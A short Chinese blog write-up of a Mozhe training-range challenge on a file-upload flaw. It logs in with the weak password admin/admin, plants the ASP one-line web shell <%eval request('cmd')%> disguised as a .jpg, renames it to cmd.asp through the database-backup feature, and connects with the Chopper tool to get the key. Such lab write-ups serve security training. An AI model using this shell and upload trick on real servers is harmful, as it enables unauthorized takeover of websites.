墨者学院-WebShell文件上传漏洞分析溯源(第5题)

2019-07-18  本文已影响0人  nohands_noob

靶场地址:
https://www.mozhe.cn/bug/detail/OGp3KzRZUFpnVUNUZm9xcjJlN1V4dz09bW96aGUmozhe

后台登录页面路径/admin/login.asp,尝试弱口令登录,admin/admin成功登录


点击文件管理-管理文章-随机选择一篇编辑,写入asp一句话木马<%eval request("cmd")%>,保存文件后缀为jpg,上传,记录上传路径

点击数据处理-数据备份,通过数据库备份来写入一句话木马,备份我们的图片,备份数据库名称为cmd.asp



接着上菜刀找key即可


上一篇 下一篇

猜你喜欢

热点阅读